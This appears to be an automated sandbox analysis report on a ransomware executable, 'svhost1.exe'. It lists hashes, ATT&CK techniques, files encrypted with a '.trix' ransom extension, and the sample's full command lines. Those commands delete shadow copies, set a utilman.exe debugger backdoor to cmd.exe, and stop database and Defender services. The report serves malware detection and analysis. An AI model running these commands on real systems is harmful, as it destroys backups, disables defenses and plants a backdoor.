247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536

General

Target

svhost1.exe
Size

2.8MB
MD5

0527539f8c9af38ea8c36e9d2be595cd
SHA1

a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
SHA256

247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
SHA512

00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4

Score

9^/10

ransomware evasion persistence spyware

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of WriteProcessMemory 94 IoCs

Processes:

svhost1.exepowershell.exepowershell.exe

description	pid	process	target process
PID 664 wrote to memory of 868	664	svhost1.exe	powershell.exe
PID 664 wrote to memory of 868	664	svhost1.exe	powershell.exe
PID 868 wrote to memory of 1080	868	powershell.exe	net.exe
PID 868 wrote to memory of 1080	868	powershell.exe	net.exe
PID 664 wrote to memory of 2092	664	svhost1.exe	powershell.exe
PID 664 wrote to memory of 2092	664	svhost1.exe	powershell.exe
PID 2092 wrote to memory of 3712	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3712	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3180	2092	powershell.exe	vssadmin.exe
PID 2092 wrote to memory of 3180	2092	powershell.exe	vssadmin.exe
PID 2092 wrote to memory of 1872	2092	powershell.exe	reg.exe
PID 2092 wrote to memory of 1872	2092	powershell.exe	reg.exe
PID 2092 wrote to memory of 1912	2092	powershell.exe	reg.exe
PID 2092 wrote to memory of 1912	2092	powershell.exe	reg.exe
PID 2092 wrote to memory of 3528	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3528	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3328	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3328	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2272	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2272	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 496	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 496	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3648	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3648	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3800	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3800	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1080	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1080	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2860	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2860	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 732	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 732	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2108	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2108	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3552	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3552	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 276	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 276	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3888	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3888	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3540	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3540	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1836	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1836	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2252	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2252	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3052	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3052	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 508	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 508	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3996	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3996	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3992	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 3992	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2220	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 2220	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 992	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 992	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1060	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1060	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1800	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1800	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1008	2092	powershell.exe	WMIC.exe
PID 2092 wrote to memory of 1008	2092	powershell.exe	WMIC.exe

Runs net.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3180 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

868 powershell.exe
868 powershell.exe
868 powershell.exe
2092 powershell.exe
2092 powershell.exe
2092 powershell.exe

pid	process
3180	vssadmin.exe

pid	process
868	powershell.exe
868	powershell.exe
868	powershell.exe
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled"	reg.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

svhost1.exe

description	ioc	process
File opened for modification	C:\Program Files\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini	svhost1.exe

Suspicious use of AdjustPrivilegeToken 1643 IoCs

Processes:

powershell.exepowershell.exeWMIC.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	3712	WMIC.exe
Token: SeSecurityPrivilege	3712	WMIC.exe
Token: SeTakeOwnershipPrivilege	3712	WMIC.exe
Token: SeLoadDriverPrivilege	3712	WMIC.exe
Token: SeSystemProfilePrivilege	3712	WMIC.exe
Token: SeSystemtimePrivilege	3712	WMIC.exe
Token: SeProfSingleProcessPrivilege	3712	WMIC.exe
Token: SeIncBasePriorityPrivilege	3712	WMIC.exe
Token: SeCreatePagefilePrivilege	3712	WMIC.exe
Token: SeBackupPrivilege	3712	WMIC.exe
Token: SeRestorePrivilege	3712	WMIC.exe
Token: SeShutdownPrivilege	3712	WMIC.exe
Token: SeDebugPrivilege	3712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3712	WMIC.exe
Token: SeRemoteShutdownPrivilege	3712	WMIC.exe
Token: SeUndockPrivilege	3712	WMIC.exe
Token: SeManageVolumePrivilege	3712	WMIC.exe
Token: 33	3712	WMIC.exe
Token: 34	3712	WMIC.exe
Token: 35	3712	WMIC.exe
Token: 36	3712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3712	WMIC.exe
Token: SeSecurityPrivilege	3712	WMIC.exe
Token: SeTakeOwnershipPrivilege	3712	WMIC.exe
Token: SeLoadDriverPrivilege	3712	WMIC.exe
Token: SeSystemProfilePrivilege	3712	WMIC.exe
Token: SeSystemtimePrivilege	3712	WMIC.exe
Token: SeProfSingleProcessPrivilege	3712	WMIC.exe
Token: SeIncBasePriorityPrivilege	3712	WMIC.exe
Token: SeCreatePagefilePrivilege	3712	WMIC.exe
Token: SeBackupPrivilege	3712	WMIC.exe
Token: SeRestorePrivilege	3712	WMIC.exe
Token: SeShutdownPrivilege	3712	WMIC.exe
Token: SeDebugPrivilege	3712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3712	WMIC.exe
Token: SeRemoteShutdownPrivilege	3712	WMIC.exe
Token: SeUndockPrivilege	3712	WMIC.exe
Token: SeManageVolumePrivilege	3712	WMIC.exe
Token: 33	3712	WMIC.exe
Token: 34	3712	WMIC.exe
Token: 35	3712	WMIC.exe
Token: 36	3712	WMIC.exe
Token: SeBackupPrivilege	3340	vssvc.exe
Token: SeRestorePrivilege	3340	vssvc.exe
Token: SeAuditPrivilege	3340	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3528	WMIC.exe
Token: SeSecurityPrivilege	3528	WMIC.exe
Token: SeTakeOwnershipPrivilege	3528	WMIC.exe
Token: SeLoadDriverPrivilege	3528	WMIC.exe
Token: SeSystemProfilePrivilege	3528	WMIC.exe
Token: SeSystemtimePrivilege	3528	WMIC.exe
Token: SeProfSingleProcessPrivilege	3528	WMIC.exe
Token: SeIncBasePriorityPrivilege	3528	WMIC.exe
Token: SeCreatePagefilePrivilege	3528	WMIC.exe
Token: SeBackupPrivilege	3528	WMIC.exe
Token: SeRestorePrivilege	3528	WMIC.exe
Token: SeShutdownPrivilege	3528	WMIC.exe
Token: SeDebugPrivilege	3528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3528	WMIC.exe
Token: SeRemoteShutdownPrivilege	3528	WMIC.exe
Token: SeUndockPrivilege	3528	WMIC.exe
Token: SeManageVolumePrivilege	3528	WMIC.exe

Drops file in Windows directory 44 IoCs

Processes:

svhost1.exe

description	ioc	process
File created	C:\Windows\DtcInstall.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\setupact.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\win.ini_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svhost1.exe
File opened for modification	C:\Windows\write.exe	svhost1.exe
File opened for modification	C:\Windows\bfsvc.exe	svhost1.exe
File created	C:\Windows\bootstat.dat_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\splwow64.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\twain_32.dll	svhost1.exe
File created	C:\Windows\explorer.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\Professional.xml	svhost1.exe
File opened for modification	C:\Windows\PFRO.log	svhost1.exe
File opened for modification	C:\Windows\regedit.exe	svhost1.exe
File opened for modification	C:\Windows\splwow64.exe	svhost1.exe
File created	C:\Windows\HelpPane.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\lsasetup.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\winhlp32.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\WMSysPr9.prx	svhost1.exe
File opened for modification	C:\Windows\lsasetup.log	svhost1.exe
File created	C:\Windows\PFRO.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\explorer.exe	svhost1.exe
File opened for modification	C:\Windows\notepad.exe	svhost1.exe
File created	C:\Windows\WindowsUpdate.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\DtcInstall.log	svhost1.exe
File opened for modification	C:\Windows\HelpPane.exe	svhost1.exe
File created	C:\Windows\mib.bin_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\Professional.xml_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\win.ini	svhost1.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	svhost1.exe
File created	C:\Windows\bfsvc.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\bootstat.dat	svhost1.exe
File created	C:\Windows\notepad.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\setupact.log	svhost1.exe
File opened for modification	C:\Windows\hh.exe	svhost1.exe
File opened for modification	C:\Windows\mib.bin	svhost1.exe
File created	C:\Windows\system.ini_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\system.ini	svhost1.exe
File created	C:\Windows\twain_32.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\WindowsShell.Manifest_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Windows\winhlp32.exe	svhost1.exe
File created	C:\Windows\WMSysPr9.prx_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\hh.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\regedit.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Windows\write.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

1080 net.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

408 bcdedit.exe
1060 bcdedit.exe

pid	process
1080	net.exe

pid	process
408	bcdedit.exe
1060	bcdedit.exe

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe

Drops file in Program Files directory 346 IoCs

Processes:

svhost1.exe

description	ioc	process
File created	C:\Program Files\CompleteSuspend.rtf_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\7-Zip\readme.txt_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\crashreporter.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\UnprotectUnblock.gif_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\sqmapi.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll	svhost1.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpAzSubmit.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll	svhost1.exe
File created	C:\Program Files\Windows Defender\MSASCuiL.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpLics.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\application.ini_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\IA2Marshal.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Microsoft Office\AppXManifest.xml_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\ieinstal.exe	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\platform.ini_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\LockTest.nfo	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\WMPMediaSharing.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Media Player\WMPNSSUI.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpRtp.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\SymSrv.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\lgpllibs.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\libEGL.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe.sig	svhost1.exe
File created	C:\Program Files\RedoImport.xla_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\AccessibleHandler.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\install.log_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\libGLESv2.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll	svhost1.exe
File created	C:\Program Files\7-Zip\7z.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\dependentlibs.list	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Windows Defender\MpUXSrv.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\install.log	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe.sig_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\CompareHide.WTV_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\AmStatusInstall.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\MsMpEng.exe_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Internet Explorer\IEShims.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\ClientWMIInstall.mof	svhost1.exe
File created	C:\Program Files\Windows Defender\ProtectionManagement.mof_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File created	C:\Program Files\Mozilla Firefox\freebl3.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\MpCommu.dll	svhost1.exe
File opened for modification	C:\Program Files\Windows Defender\NisLog.dll	svhost1.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	svhost1.exe
File created	C:\Program Files\BackupProtect.kix_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	svhost1.exe
File created	C:\Program Files\Windows Defender\EppManifest.dll_ID_625234068_[decryption@qbmail.biz].trix	svhost1.exe

C:\Users\Admin\AppData\Local\Temp\svhost1.exe
"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Drops file in Program Files directory
PID:664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -Command -
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" view
3⤵
- Discovers systems in the same network
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -Command -
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3712

C:\Windows\system32\vssadmin.exe
"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:3180

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
3⤵
- Sets file execution options in registry
PID:1872

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
3⤵
- Sets file execution options in registry
PID:1912

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
3⤵
PID:3328

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
3⤵
PID:2272

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
3⤵
PID:496

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
3⤵
PID:3648

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
3⤵
PID:3800

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
3⤵
PID:1080

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
3⤵
PID:2860

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
3⤵
PID:732

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
3⤵
PID:2108

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
3⤵
PID:3552

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
3⤵
PID:276

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
3⤵
PID:3888

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
3⤵
PID:3540

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
3⤵
PID:1836

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
3⤵
PID:2252

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
3⤵
PID:3052

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
3⤵
PID:508

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
3⤵
PID:3996

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
3⤵
PID:3992

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
3⤵
PID:2220

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
3⤵
PID:992

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
3⤵
PID:1060

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
3⤵
PID:1800

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
3⤵
PID:1008

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
3⤵
PID:268

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
3⤵
PID:3848

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
3⤵
PID:1476

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
3⤵
PID:1872

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
3⤵
PID:3084

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
3⤵
PID:3132

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
3⤵
PID:2252

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
3⤵
PID:3444

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
3⤵
PID:508

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
3⤵
PID:3996

